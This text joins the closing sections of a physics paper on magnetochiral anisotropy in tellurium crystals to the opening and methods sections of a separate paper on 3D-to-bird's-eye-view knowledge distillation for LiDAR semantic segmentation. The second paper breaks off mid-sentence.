odd-in-\(k_{z}\) part of \(\mathcal{I}_{\mathbf{k}}^{(ne)}\{f\}\). For simplicity we used the relaxation time approximation for deriving the antisymmetric component of the hole distribution function \(f_{\mathbf{k}}^{(2)}\) and get \(f_{\mathbf{k}}^{(2)}=-\tau\mathcal{I}_{\mathbf{k}}^{(ne)}\{f\}\). Substituting the collision integral into Eq. (66) we can reduce this equation to \[\delta j_{z}=-\frac{2\pi e\tau}{\hbar}\sum_{\mathbf{k},\mathbf{k}^{\prime }}|M_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\left[v_{z}^{(0)}(k_{z})-v_{z}^{(0)}(k_{z}^{ \prime})\right] \tag{68}\] \[\times\left[(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}})N_{\mathbf{q}}-f_{\mathbf{k}^ {\prime}}(1-f_{\mathbf{k}})\right]\delta(\varepsilon_{\mathbf{k}^{\prime}}-\varepsilon _{\mathbf{k}}-\hbar\Omega_{\mathbf{q}})\;.\] For an estimation of the current magnitude we simplify in the collision integral the dispersion (5) to \(\varepsilon_{\mathbf{k}}^{0}=\mathcal{A}k^{2}\) and take into account only the cubic term in the expansion of \(\delta\varepsilon(k_{z})\), see Eq. (48). Then the expressions in the sums (62) and (68) differ by the multipliers \((\varepsilon_{\mathbf{k}}-\varepsilon_{\mathbf{k}^{\prime}})\) and \[\frac{gB_{z}}{\varepsilon_{F}}\left[v_{z}^{(0)}(k_{z})\left( \frac{\beta k_{z}}{\Delta_{2}}\right)^{3}-v_{z}^{(0)}(k_{z}^{\prime})\left( \frac{\beta k_{z}^{\prime}}{\Delta_{2}}\right)^{3}\right]\] \[\sim\frac{gB_{z}}{\varepsilon_{F}}\left(\frac{\beta}{\Delta_{2}} \right)^{3}\frac{k^{2}}{\hbar}\left(\varepsilon_{\mathbf{k}}-\varepsilon_{\mathbf{k} ^{\prime}}\right)\;.\] It follows then that the current (68) can be estimated as \[\delta j_{z}\sim e\tau\frac{gB_{z}}{\varepsilon_{F}}\left(\frac{\beta}{\Delta_ {2}}\right)^{3}\frac{\kappa_{F}^{2}}{\hbar}\mathcal{J}\;.\] For the simplified energy dispersion the conductivity reads \[\sigma_{zz}\sim\frac{e^{2}\tau\varepsilon_{F}\kappa_{F}}{\hbar^{2}}\] and we finally obtain \[\delta j_{z}\sim g\frac{e^{3}\tau^{2}}{\hbar^{3}}\left(\frac{\beta\kappa_{F}}{ \Delta_{2}}\right)^{3}E_{z}^{2}B_{z}\,. \tag{69}\] One can see that the obtained estimation of the magnetochiral current for the second mechanism has the same order as the contribution (60). ## VIII Discussion We begin the discussion with a general symmetry analysis of the eMChA effect studied in this paper. Tellurium is a crystal with chiral (or enantiomorphic) structure. By definition, a chiral periodic solid (or molecule) is non-superimposable with its mirror image and has a "handedness". Two modifications of a chiral structure that are mirror-like to each other are called enantiomorphic. In tellurium crystals, the two mirror modifications are characterized by the space groups \(D_{3}^{4}\) (\(P3_{2}12\)) and \(D_{3}^{6}\) (\(P3_{2}21\)). Among 32 crystallographic point groups, 11 are enantiomorphic, namely, \(\mathcal{F}=C_{1},C_{2},D_{2},C_{4},D_{4},C_{3},D_{3}\) (quartz, tellurium), \(C_{6},D_{6},T\) and \(O\). In this regard, the question arises which of the coefficients \(G^{(n)}\) in Eqs. (2) coincide and which differ in sign for the two enantiomorphs. To answer this question, consider the achiral point group \(D_{3h}\), which differs from the \(D_{3}\) group by the presence of a symmetry plane \(\sigma_{h}\) and includes 12 operations \(g\in D_{3h}\). The \(D_{3h}\) symmetry allows nonzero terms in (2) with coefficients \(G^{(3)},G^{(8)}\) and \(G^{(10)}\). Consequently, these three coefficients describe an electric current nonlinear in \(\mathbf{E}\) and linear in \(\mathbf{B}\) with its sign independent of the enantiomorphic modification. The remaining seven coefficients \(G^{(n)}\) describe magnetochiral currents with opposite directions for the \(D_{3}^{4}\) and \(D_{3}^{6}\) phases. This way of separating the chiral and achiral contributions to the electric current is applicable for ten enantiomorphic crystal classes \(\mathcal{F}\), except for the \(O\) class. Each of them can be associated with an achiral point group \(\mathcal{F}_{a}\ni\mathcal{F}\), which has no spatial inversion center and which admits nonzero coefficients \(G_{ijkl}\) in Eq. (1). These coefficients describe achiral transport, whereas the additional coefficients arising in the \(\mathcal{F}\) group are chiral. Chiral and achiral nature of the coefficients can be readily determined from the behavior of physical quantities in the left and right parts of Eqs. (2) under reflection in the \(\sigma_{h}\) plane. Indeed, under this operation the component \(\delta j_{z}\) changes sign, but the product \(E_{1}^{2}B_{z}\) is invariant which means that the coefficient \(G^{(1)}\) is chiral. At the same time, the product \(E_{x}^{2}B_{y}\) changes sign upon reflection \(\sigma_{h}\), as does the component \(\delta j_{x}\). Therefore, the coefficient \(G^{(3)}\) describes achiral transport. Let us list the achiral groups corresponding to the above ten chiral groups: \(\mathcal{F}_{a}=C_{s},C_{2v},D_{2d},C_{4v},D_{4d},C_{3v},D_{3h},C_{6v},D_{6d}\) and \(T_{d}\). As another example, consider the chiral group \(T\) (silenite Bi\({}_{12}\)SiO\({}_{20}\), bismuth germanate Bi\({}_{12}\)GeO\({}_{20}\)) and the corresponding achiral group \(T_{d}\). The \(T_{d}\) symmetry allows for the current \(\delta j_{x}\) terms proportional to \((E_{y}^{2}-E_{z}^{2})B_{x}\) and \((E_{y}B_{y}-E_{z}B_{z})E_{x}\). In addition, the \(T\) group has chiral contributions proportional to \(|\mathbf{E}|^{2}B_{x},(\mathbf{E}\cdot\mathbf{B})E_{x}\) and \(E_{x}^{2}B_{x}\). The symmetry point transformation which can be used to divide between chiral and achiral coefficients is the reflection in the plane \(\sigma_{v}\parallel(110)\). As for the enantiomorphic group \(O\), it has no partner \(\mathcal{F}_{a}\ni O\) without an inversion center. Adding a reflection plane to the group \(O\) leads to the \(O_{h}\) group in which all the coefficients \(G_{ijkl}\) are equal to zero. Hence, for the \(O\) group, all the coefficients \(G_{ijkl}\) in the expansion (1) are chiral. Note that the BiTeI crystal has the achiral trigonal symmetry \(C_{3v}\) and allows a nonreciprocal rectification effect \(\delta j_{x}\propto E_{x}^{2}B_{y}\)[16], which however is not a magnetochiral effect. In Sections IV-VII, we have considered successively various models and mechanisms of the eMChA effect: the approximation of a constant relaxation time, the general procedure for calculating the magnetochiral current for different elastic and inelastic relaxation times, and the approximation of a small chiral parameter \(\beta\). A derivation of the exact expression for the current beyond the fixed relaxation time approximation cannot be obtained analytically and is outside the scope of this work. However, the carried-out study shows that the magneto-chiral current \(\delta j_{z}\) in tellurium for a degenerate hole gas can be described by \(\delta j_{z}=G_{zzzz}E_{z}^{2}B_{z}\) with \[G_{zzzz}=cg\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{ 2}\hbar^{3}}\left(\frac{\beta\kappa_{F}}{\Delta_{2}}\right)^{3}\,, \tag{70}\] where \(c\) is a factor of the order of unity. This means that the resistance of tellurium \(R\) has the nonreciprocal chiral contribution \[R=R_{0}(1+\gamma j_{z}B_{z}),\qquad\gamma=\frac{G_{zzzz}}{\sigma^{2}}, \tag{71}\] where \(R_{0}\) is the resistance in the absence of magnetic field, and \(\sigma\) is the conductivity. For an estimation we ignore the difference between \(\mathcal{A}_{1}\) and \(\mathcal{A}_{2}\). Taking the conductivity as \(\sigma=pe^{2}\tau/m^{*}\) where \(m^{*}=2\mathcal{A}_{1}/\hbar^{2}\), the coefficient \(g\) in Eq. (3) as \(g=g^{*}\mu_{\rm B}\), where \(\mu_{\rm B}\) is the Bohr magneton and \(g^{*}\) is the effective \(g\)-factor, and noting that the Fermi wavevector is related to the hole concentration as \(\kappa_{\rm F}^{3}=3\pi^{2}p\), we get \[\gamma\approx\frac{3\mu_{\rm B}{g^{*}m^{*}}^{2}}{ep}\bigg{(}\frac{\beta}{\hbar \Delta_{2}}\bigg{)}^{3}. \tag{72}\] We use the parameters suitable for Te: \(\beta=2.5\times 10^{-8}\) eV cm, \(\Delta_{2}=63\) meV, \(m^{*}=0.2m_{0}\), \(g^{*}=1\), and the hole concentration \(p=10^{16}\) cm\({}^{-3}\). Then we obtain that the ratio \(\beta\kappa_{\rm F}/\Delta_{2}\approx 0.27\ll 1\), and one can apply the approximate equation (70) for the estimation. The result yields \(3\times 10^{-7}\) cm\({}^{2}\) T\({}^{-1}\)A\({}^{-1}\) for the magneto-induced rectification coefficient \(\gamma\). The eMCh current measurements presented in Figs. 3 and 4 in Ref. [9] were performed in the following two geometries: (i) the electric current measured in the \(x\) direction at \(\mathbf{E}\parallel x\) and the magnetic field vector lying in the \((xy)\) plane, (ii) \(\mathbf{j},\mathbf{E}\parallel z\), and the magnetic field in the \((xz)\) plane. It follows from the general equations (2) that, in these two setups, one has \[\delta j_{x} =G_{xxxx}E_{x}^{2}B\sin\theta_{y}=(G^{(5)}+G^{(7)})E_{x}^{2}B\sin \theta_{y}\,, \tag{73}\] \[\delta j_{z} =G_{zzzz}E_{z}^{2}B\sin\theta_{x}=G^{(1)}E_{z}^{2}B\sin\theta_{x}\,, \tag{74}\] where \(B=|\mathbf{B}|\), \(\theta_{y}\) is the angle between the vector \(\mathbf{B}\) lying in the \((xy)\) plane and the \(y\) axis, \(\theta_{x}\) is the angle between the vector \(\mathbf{B}\) lying in the \((xz)\) plane and the \(x\) axis. According to Rikken and Avarvari [9] their measurements on tellurium show that \(3\gamma_{xxxx}\approx\gamma_{xxxy}\) and \(12\gamma_{zzzz}\approx\gamma_{xxxy}\), and \(\gamma_{zzzz}\ll\gamma_{zzxx}\). These results are in complete contradiction to the phenomenological equations (2), (73) and (74) derived for D\({}_{3}\) symmetry crystals. Indeed, the symmetry predicts that \(\gamma_{xxxy}=\gamma_{zzzz}=0\) while the component \(\gamma_{zzzz}\) is allowed. This is a key difficulty in comparing the derived theory with the experiment [9] and an additional experimental work is needed on the study of the chiral transport in tellurium crystals. In Ref. [9], a theoretical estimate of the \(\gamma\) value is also given. The equation for \(\gamma\) is derived in the framework of a model where the linear in \(k_{z}B_{z}\) term in the hole energy dispersion is taken into account only. As stressed in Section IV this term does not lead to the eMChA and one needs to include the higher-order term \(k_{z}^{3}B_{z}\) in the hole Hamiltonian, as unambiguously follows from Eq. (14) for \(\delta j_{z}\). Moreover, the \(k_{z}B_{z}\)-linear term \(\delta\varepsilon_{\mathbf{k}}=\chi k_{z}B_{z}\) in the hole dispersion is given by \(\chi=-g\beta/\Delta_{2}\) with an estimate for tellurium \(|\chi|=3.7\times 10^{-32}\) J m/T. The value of \(|\chi|\) assumed in Ref. [9] is \(\sim 40\) times larger. So far, we have examined the effect of a static electric field \(\mathbf{E}\). It is easiest to generalize the theory to the case of a time-dependent field \(E_{z}(t)=E_{z}^{(0)}\cos\omega t\) in the constant-time approximation for frequencies satisfying the condition \(\omega\ll\varepsilon_{F}/\hbar\), while the product \(\omega\tau\) may be arbitrary. To find the distribution function \(f_{\mathbf{k}}(t)\), the derivative \(\partial f_{\mathbf{k}}/\partial t\) must be added to the left side of the kinetic equation (11). Omitting calculations, we present the result. The formula (14) for \(\omega\neq 0\) becomes \[\delta j_{z}(\omega)=\frac{\delta j_{z}(0)}{1+\omega^{2}\tau^{2}}\,, \tag{75}\] where \(\delta j_{z}(0)\) is the magnetochiral current in a static electric field. The alternating electric field induces not only a dc current (75), but also a current at double frequency \(2\omega\). For the second harmonic generation we have \[j_{z}^{2\omega}(t)=j_{z;2\omega}\mathrm{e}^{-2\mathrm{i}\omega t}+j_{z;-2\omega} \mathrm{e}^{2\mathrm{i}\omega t}\:, \tag{76}\] where the complex amplitude is given by \[j_{z;2\omega}=j_{z;-2\omega}^{*}=\frac{1}{2}\frac{\delta j_{z}(0)}{(1-\mathrm{i }\omega\tau)(1-2\mathrm{i}\omega\tau)}\:.\] It should be mentioned that experimentally it is convenient to detect the magneto-chiral current by measuring the amplitude of the second harmonic at \(\omega\tau\ll 1\)[9]. In fact, Eq. (75) describes the phenomenon is called magneto-photogalvanic effect (MPGE). In general, it is described by the following phenomenological equation [34; 35; 36; 37; 38] \[j_{i}=G_{ijkl}(\omega)\{E_{j}E_{k}^{*}\}B_{l}+G_{klm}^{(\mathrm{circ})}R_{l}B_ {m}\:, \tag{77}\] where \(\mathbf{E}\) is the complex amplitude of the radiation electric field and \[\{E_{j}E_{k}^{*}\}=\frac{1}{2}(E_{j}E_{k}^{*}+E_{j}^{*}E_{k})\:,\quad\mathbf{R}= \mathrm{i}(\mathbf{E}\times\mathbf{E}^{*})\:.\] The first and second contributions in the right-hand side of Eq. (77) represent the so-called linear and circular MPGE. At zero frequency (static electric field) the coefficients \(G_{ijkl}(\omega)\) coincide with the coefficients \(G_{ijkl}\) in Eq. (1). The electric field of the electromagnetic wave is complex and the magneto-photogalvanic current contains an additional contribution described by the pseudotensor \(\mathbf{G}^{(\mathrm{circ})}\) if the circular polarization of the exciting light is nonzero. The circular MPGE has first been observed in the achiral GaAs crystal [39]. Similarly to the dc effect (2) the coefficients \(G_{ijkl}(\omega)\) and \(\mathbf{G}^{(\mathrm{circ})}\) can be divided into chiral and achiral ones. Let us consider the products \(R_{i}B_{j}\) which transform in \(D_{3h}\) according to \((A_{2}^{\prime}+E^{\prime\prime})\times(A_{2}^{\prime}+E^{\prime\prime})=A_{1 }^{\prime}+2E^{\prime\prime}+(A_{1}^{\prime}+A_{2}^{\prime}+E^{\prime})\): \[R_{z}B_{z}\:(A_{1}^{\prime});\quad R_{x}B_{x}+R_{y}B_{y}\:(A_{1} ^{\prime}); \tag{78}\] \[R_{x}B_{y}-R_{y}B_{x}\:(A_{2}^{\prime});\] \[R_{x}B_{x}-R_{y}B_{y},-R_{x}B_{y}-R_{y}B_{x}\:(E^{\prime});\] \[R_{z}B_{y},-R_{z}B_{x}\:(E^{\prime\prime});\quad R_{y}B_{z},-R_{ x}B_{z}\:(E^{\prime\prime})\:.\] Thus, an achiral contribution to the current is given by \[\delta j_{x} =G_{1}^{(\mathrm{circ})}(R_{x}B_{x}-R_{y}B_{y})\:,\] \[\delta j_{y} =-G_{1}^{(\mathrm{circ})}(R_{x}B_{y}+R_{y}B_{x})\:.\] In the \(D_{3}\) symmetry, additional chiral terms appear \[\delta j_{x} =G_{2}^{(\mathrm{circ})}R_{z}B_{y}+G_{3}^{(\mathrm{circ})}R_{y}B _{z}\:, \tag{79}\] \[\delta j_{y} =-G_{2}^{(\mathrm{circ})}R_{z}B_{x}-G_{3}^{(\mathrm{circ})}R_{x} B_{z}\:,\] \[\delta j_{z} =G_{4}^{(\mathrm{circ})}(R_{x}B_{y}-R_{y}B_{x})\:.\] It is instructive to describe the hierarchical sequence of point-group categories: among 21 crystal classes lacking inversion symmetry, 18 are gyrotropic and, as mentioned above, 11 are enantiomorphic. All noncentrosymmetric crystals allow nonzero coefficients \(G_{ijkl}\) in Eq. (1) and \(G_{ijkl}(\omega),G_{klm}^{(\mathrm{circ})}\) in Eq. (77). We remind that the gyrotropic classes allow nonzero components of the rank 3 tensors \(\gamma_{ijk}\) antisymmetric under exchange of one pair of its indices or, equivalently, the rank 2 pseudotensors. In the gyrotropic crystals, there exist coefficients in Eq. (77) that relate the current vector components with pseudovector combinations of the products of \(E_{j}E_{k}^{*}B_{l}\) and describe the magneto-gyrotropic photogalvanic effects [35; 37; 40]. And finally, in the chiral crystals there are coefficients which have different signs for the different enantiomorphic modifications. Recently the magneto-chiral photogalvanic current \(\mathbf{j}\propto\mathbf{B}\times\mathbf{R}\) has been studied in bulk tellurium [41] in both terahertz and infrared ranges at indirect intraband and direct intersubband optical transitions in the valence band, respectively. ## IX Summary We have derived the theory of eMChA effect in tellurium which shows an intricate combination of chirality and magnetism. Macroscopic phenomenological relationship is established between the electric current density and products of the magnetic field and bilinear combinations of the electric field strength. Two microscopic mechanisms of the effect are considered, one with allowance for elastic scattering processes only and the other where the eMChA current is formed in the course of hole gas heating and its energy relaxation. In the purely elastic mechanism, the general formalism is developed to calculate the eMChA current at arbitrary ratio between the camel-back dispersion parameter \(\beta\), Fermi energy and valence-band splitting \(2\Delta_{2}\). The exact result is obtained in the limit of small \(\beta\). It shows the same order of magnitude of the magneto-induced rectification coefficient \(\gamma\) as that obtained in the simple relaxation-time approximation; however, the value and even the sign of \(\gamma\) are different. An attention is attracted to the difference between the achiral and chiral contributions to the magneto-induced rectification which, respectively, coincide and are opposite in sign in the two enantiomorphic modifications of chiral crystals. Relationship between the eMChA and magneto-induced photogalvanic effects is discussed and the chiral and achiral coefficients describing these effects in tellurium are identified. The developed theory of eMChA is compared with the available experimental data. ###### Acknowledgements. L. E. G. acknowledges support from the Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) Project No. Ga501/19-1. E. L. I. acknowledges support from the Russian Science Foundation (Project No. 22-12-00211).
2304.11393
Knowledge Distillation from 3D to Bird's-Eye-View for LiDAR Semantic Segmentation
LiDAR point cloud segmentation is one of the most fundamental tasks for autonomous driving scene understanding. However, it is difficult for existing models to achieve both high inference speed and accuracy simultaneously. For example, voxel-based methods perform well in accuracy, while Bird's-Eye-View (BEV)-based methods can achieve real-time inference. To overcome this issue, we develop an effective 3D-to-BEV knowledge distillation method that transfers rich knowledge from 3D voxel-based models to BEV-based models. Our framework mainly consists of two modules: the voxel-to-pillar distillation module and the label-weight distillation module. Voxel-to-pillar distillation distills sparse 3D features to BEV features for middle layers to make the BEV-based model aware of more structural and geometric information. Label-weight distillation helps the model pay more attention to regions with more height information. Finally, we conduct experiments on the SemanticKITTI dataset and Paris-Lille-3D. The results on SemanticKITTI show more than 5% improvement on the test set, especially for classes such as motorcycle and person, with more than 15% improvement. The code can be accessed at https://github.com/fengjiang5/Knowledge-Distillation-from-Cylinder3D-to-PolarNet.
Feng Jiang, Heng Gao, Shoumeng Qiu, Haiqiang Zhang, Ru Wan, Jian Pu
2023-04-22T13:03:19Z
http://arxiv.org/abs/2304.11393v1
# Knowledge Distillation from 3D to Bird's-Eye-View for LiDAR Semantic Segmentation ###### Abstract LiDAR point cloud segmentation is one of the most fundamental tasks for autonomous driving scene understanding. However, it is difficult for existing models to achieve both high inference speed and accuracy simultaneously. For example, voxel-based methods perform well in accuracy, while Bird's-Eye-View (BEV)-based methods can achieve real-time inference. To overcome this issue, we develop an effective 3D-to-BEV knowledge distillation method that transfers rich knowledge from 3D voxel-based models to BEV-based models. Our framework mainly consists of two modules: the voxel-to-pillar distillation module and the label-weight distillation module. Voxel-to-pillar distillation distills sparse 3D features to BEV features for middle layers to make the BEV-based model aware of more structural and geometric information. Label-weight distillation helps the model pay more attention to regions with more height information. Finally, we conduct experiments on the SemanticKITTI dataset and Paris-Lille-3D. The results on SemanticKITTI show more than 5% improvement on the test set, especially for classes such as motorcycle and person, with more than 15% improvement. The code can be accessed at [https://github.com/fengjiang5/Knowledge-Distillation-from-Cylinder3D-to-PolarNet](https://github.com/fengjiang5/Knowledge-Distillation-from-Cylinder3D-to-PolarNet). Scene understanding, point clouds, knowledge distillation, semantic segmentation ## I Introduction The 3D point clouds can effectively capture the real-world scene while preserving geometric and structural information to the greatest extent. Point cloud semantic segmentation plays a very important role in the perception of the surrounding environment, especially in autonomous driving, which aims to predict a label for each point in the current scan [1]. Therefore, balancing speed and accuracy is especially important. Currently, deep learning-based LiDAR segmentation methods can be generally categorized as point-based [2, 3, 4], projection-based [5, 6, 7, 8] and voxel-based [9, 10]. For instance, PointNet [2] is a point-based method that only uses a stack of MLPs to learn the representations of raw point clouds directly. Projection-based methods can be further divided into two categories: range-based methods that use spherical projection [6, 8] and Bird's-Eye-View (BEV)-based methods [5]. After point cloud projection, these methods can take full advantage of traditional 2D convolutional neural networks. The inference speed of these methods is very fast and can meet the requirements of real-time [11], but the precision of these models is not satisfactory. In contrast, voxel-based methods [9, 10] can achieve high accuracy but are difficult to apply in practice due to the use of time-consuming and computationally expensive sparse operators [12]. Geoffrey Hinton proposed knowledge distillation [13], which is usually used for model compression. It trains the simple student model by using the outputs of the teacher model as a supervisory signal. Currently, many methods used for point cloud segmentation apply knowledge distillation for model compression [10] or better feature extraction [14]. However, few methods focus on knowledge distillation between two different point cloud segmentation methods. Therefore, the trade-off between high accuracy and high inference speed is a pivotal problem for practical applications, such as autonomous driving. To address this issue, we propose a novel framework to improve the accuracy of BEV-based models while maintaining their real-time inference speed. We develop voxel-to-pillar distillation and label-weight distillation modules for knowledge distillation. Specifically, voxel-to-pillar distillation is an attention-based method for middle feature distillation that utilizes cross-attention mechanisms and MSE loss to help BEV-based models learn more structural and spatial geometric information from voxel-based models. Label-weight distillation is used for the last layer before classification, which selects regions with relatively large values in the height count map for distillation since these regions are the main reason for the performance gap. We evaluate our model on the SemanticKITTI dataset [1] and Paris-Lille-3D [15], and it outperforms the original Polar Net [5] by 5% mIoU on the test set of SemanticKITTI. We also conduct ablation studies to demonstrate the effect of the distillation modules. The results show that our framework can largely improve the segmentation performance of PolarNet, especially the performance for classes that have more height information, such as motorcycles and persons whose heights along the z-axis are compressed under the Bird's-Eye-View. The main contributions of our work are threefold: * We propose an effective knowledge distillation framework that transfers knowledge from 3D voxel-based to BEV-based models for LiDAR point cloud segmentation. * We develop a novel voxel-to-pillar distillation module that helps BEV-based models learn more deep structural and spatial geometric information. Moreover, to reduce the height information loss, we design a label-weight distillation module focusing more on key regions with rich height information. * We conduct experiments on the SemanticKITTI dataset. The results show that our framework can outperform the original by 5% mIoU on the test set, especially in classes such as motorcycle and person, with more than 15% improvement. We also conduct experiments on Paris-Lille-3D, and the results demonstrate our method's effectiveness and generalization power. ## II Related Work ### _LiDAR Segmentation_ Currently, LiDAR point cloud segmentation methods [5, 6, 7, 9, 16, 17], which are crucial for autonomous driving scene understanding, can be mainly separated into three categories: point-based, projection-based and voxel-based. Point-based methods, such as PointNet [2] and KPConv [3], consume raw point clouds as input without any voxelization or other intermediate representations, which is straightforward. However, these methods are computationally intensive due to a large number of laser points. To overcome this problem, methods based on range view (RV) and bird's-eye-view (BEV) first project 3D points into 2D space and then feed the projected maps into a 2D convolution network for feature extraction. For instance, PolarNet [5] quantizes the points into polar BEV grids and uses ring CNNs for downstream segmentation tasks, which improves accuracy while maintaining real-time inference speed. However, projection-based methods will inevitably lose considerable geometric information due to dimension compression. Cylinder3D [9], a classic voxel-based method, proposes to use a cylindrical partition and an asymmetrical 3D sparse module to retain 3D representation and tackle the issues induced by the point cloud's sparsity and unevenness of distribution at the same time. Although voxel-based methods have the ability to achieve high accuracy, they demand a huge amount of memory usage and computing resources. Therefore, they are difficult to use in real-world applications such as real vehicle deployment. To reach high precision and decrease inference time, we propose a novel knowledge distillation framework to help BEV-based models learn more geometric and structural information. ### _Knowledge Distillation_ Knowledge distillation, first proposed by Geoffrey Hinton in [13], is a generic model compression architecture that transfers the outstanding learning representation capability of cumbersome and large models to small but easily deployable models. In addition, it can also be used for auxiliary supervision when training the model [14, 18]. Wu _et al._[18] proposed ADD, an attention-based depth knowledge distillation framework with a 3D-aware positional encoding that uses an extra lidar branch to capture depth information. They used cross-attention to improve training from the lidar branch to the main branch, and the results showed that this is better than the simple use of MSE loss. Hou [10] claimed that their Point-to-Voxel Knowledge Distillation (PVKD) is the first work that applied knowledge distillation for LiDAR semantic segmentation. In their work, they proposed a supervoxel partition method to divide the point clouds into several supervoxels and designed a difficulty-aware sampling strategy to more frequently sample supervoxels containing less-frequent classes and faraway objects. Yan [14] proposed a 2D priors assisted semantic segmentation method to boost the representation learning on point clouds. They have achieved good results but are still limited by speed because of sparse operators. The previous methods rarely involved knowledge distillation from voxel-based methods to BEV-based methods. Our proposed framework can solve this problem well, especially for classes where much information is lost during projection, such as motorcycles and persons. ## III Method Given a certain scan of point clouds \(\mathbf{P}\in\mathbb{R}^{N\times 4}\), the objective of semantic segmentation is to predict a label for each point, where \(N\) is the number of points. Each point contains (\(x,y,z,i\)), where \((x,y,z)\) are the Cartesian coordinates relative to the LiDAR scanner and \(i\) is the reflection intensity. Fig. 1: The overview of our framework consists of three main parts: the teacher model, the student model and the knowledge distillation model. During training, we use pretrained weights for the teacher model and update the parameters of the student model and knowledge distillation model. Voxel-to-pillar distillation (VPD) is used for general middle layers, and label-weight distillation (LWD) is specifically used for the layer before classification. We propose a novel framework that can transfer knowledge from accurate voxel-based methods to efficient BEV-based methods through knowledge distillation. Specifically, we propose two general modules for knowledge distillation from 3D sparse features to BEV features to reduce the gap between these two methods. First, the point clouds independently pass through the voxel-based methods and the BEV-based methods. Then voxel-to-pillar distillation and label-weight distillation are used for certain layers to help the BEV-based methods learn more geometric and structural information. The details of the proposed framework are as follows. ### _Framework Overview_ The architecture of our framework is shown in Fig. 1. Our framework has three main parts, similar to other knowledge distillation methods [10, 14, 18]. The first is the teacher model, and here, we choose voxel-based methods as our teacher model, which have high accuracy but suffer from a computational burden. Voxel-based methods usually encode each voxel and have more geometric and structural features. We choose BEV-based methods as the student model because they are usually efficient for practical application. The last part is the knowledge distillation model, which is the main part of our framework. Benefiting from our well-designed voxel-to-pillar distillation module and label-weight distillation module, the student model can learn more valuable information during training and improve the inference performance without extra computation. In addition, we also used logit distillation similar to others [10, 13]. ### _Voxel-to-Pillar Distillation_ Voxel-to-pillar distillation is one of our framework's main modules of knowledge distillation, as illustrated in Fig. 2. Generally, voxel-based methods use sparse operators [12] because the point clouds are sparse and unevenly distributed. To maintain the sparsity of the point clouds and reduce the computational cost, most sparse operators make the features of intermediate layers still sparse, making voxel-based methods slow and hard to align directly with BEV-based methods. BEV-based methods take pillars as pseudo images, so they can directly use efficient CNNs designed for image processing, but the information is lost at the data preprocessing stage. Our proposed module helps BEV-based methods overcome this problem to some extent. The feature of voxel-based methods is denoted as \(F^{i}_{V}\), and the corresponding BEV-based feature is denoted as \(F^{i}_{B}\), where \(i\) means the \(i\)-th layer and \(F^{i}_{B}\in\mathbb{R}^{N\times C_{V}},F^{i}_{V}\in\mathbb{R}^{N\times C_{B}}\). For simplicity, here, we assume that \(F^{i}_{V}\) and \(F^{i}_{B}\) have the same size in the \(x\)-\(y\) plane. First, we use sparse convolution to compress the features of voxel-based methods \(F^{i}_{V}\) in the z-axis and denote it as \(F^{i}_{VC}\), where \(F^{i}_{VC}=f(F^{i}_{V})\) and \(f:\mathbb{R}^{N\times C_{V}}\rightarrow\mathbb{R}^{N\times C_{B}}\). Since \(F^{i}_{VC}\) is sparse, we need to obtain the coordinates of non-empty voxels, which are used to match the features of BEV-based methods exactly. Second, we flatten features from voxel-based methods and BEV-based methods, which are denoted as \(f^{i}_{V}\) and \(f^{i}_{B}\). \(f^{i}_{V}\) and \(f^{i}_{B}\) are from different methods, so they are in different domain spaces and usually have different distributions. To solve this problem, we use the domain transfer method learned from BYOL [19], specifically two MLPs with normalization. Specifically, \[\begin{split} f^{i}_{V}=&\text{MLP}(F(C(F^{i}_{V}))) \\ f^{i}_{B}=& F(F^{i}_{B}),\end{split} \tag{1}\] where MLP means domain transfer, \(F\) means flattening of the features and \(C\) means compression of the shape of the features. Then, we produce the Key from \(f^{i}_{B}\) and obtain the Query and Value from \(f^{i}_{V}\) by MLPs. We integrate these in a cross-attention module by \[Attention(Q,K,V)=\text{softmax}(\frac{QK^{T}}{\sqrt{d_{k}}})V \tag{2}\] such as [18] to generate student features \(f^{i}_{B^{\prime}}\) and use MSE loss between \(f^{i}_{B^{\prime}}\) and \(f^{i}_{V}\) to make the student methods learn the lost information during data preprocessing. We normalize the features \(f^{i}_{B^{\prime}}\) and \(f^{i}_{V}\) learned from BYOL [19], which means that we focus more on directional differences than numerical differences. Therefore, the point-to-voxel distillation loss is given as follows: \[\mathcal{L}_{VPD}\left(f_{B^{\prime}},f_{V}\right)=\frac{1}{|\mathcal{I}|}\sum _{i\in\mathcal{I}}\frac{1}{N_{i}}\left\|\frac{f^{i}_{B^{\prime}}}{\left\|f^{i} _{B^{\prime}}\right\|_{2}}-\frac{f^{i}_{V}}{\left\|f^{i}_{V}\right\|_{2}} \right\|_{2}^{2} \tag{3}\] where \(N_{i}\) is the number of nonempty voxels and \(\mathcal{I}\) is the subset of layers used for distillation. ### _Label-Weight Distillation_ Label-weight distillation is used for the last layer before classification. One of the main reasons for the performance degradation of the BEV-based methods is that they lose considerable height information, which plays an important role, especially for hard labels and hard scenes. Fig. 4 in Sec. IV-E demonstrates this point of view. When we project the points onto a \(x\)-\(y\) plane, there may only be \(4\sim 6\) pillars belonging to the class person, and the class road will mislead Fig. 2: Illustration of the voxel-to-pillar distillation (VPD) module. We flatten the 3D sparse features of the teacher model and use MLPs to transfer the domain to match the corresponding features of the student model. Then, we use a cross-attention module between the 3D sparse features and the BEV features to reinforce the learning capabilities of the student model. the model because the proportion of points on the road surface is large, although these pillars belong to the class person. We cannot use voxel-to-pillar distillation directly because we need global information in the middle layers, so we propose label-weight distillation, which focuses on the key regions. The last layer is more sensitive to height loss than the middle layers, so we use height embedding to record the height information better. Fig. 3 shows the details of label-weight distillation. Because we want the model to focus on some key regions and the last layer always has a large size, selecting some regions for distillation is necessary. We divide the whole scene into \(K\) regions. According to the above analysis, we design a method to select regions with more non-empty voxels along the z-axis. Specifically, we count the height map \(H\) for sparse voxel features, and the value is the number of nonempty voxels in the current position. Then, calculate weights for each region according to their ground truth label. The weight and the probability of selecting the \(i\)-th region are defined as \(W_{i}=H_{i}/\text{sum}(H)\), \(P_{i}=W_{i}/\text{sum}(W)\), where \(i\in\{1\cdots K\}\). We note that we do not select the region with no height information. Our proposed method is more suitable for distillation from voxel-based methods to BEV-based methods, especially for the height loss situation. Specifically, we first add the height embedding \(F_{h}\) with features from voxel-based methods \(f_{V}\), which enables the model to encode deeper high-level information. We use two sparse convolution layers on \(f_{V}\) after height encoding to compress the 3D features and transfer the domain to match the features of the BEV-based methods simultaneously. Then, we select \(M\) regions for features from BEV-based methods \(f_{B}\) and features \(f_{V^{\prime}}\) after compression. Finally, we flatten the 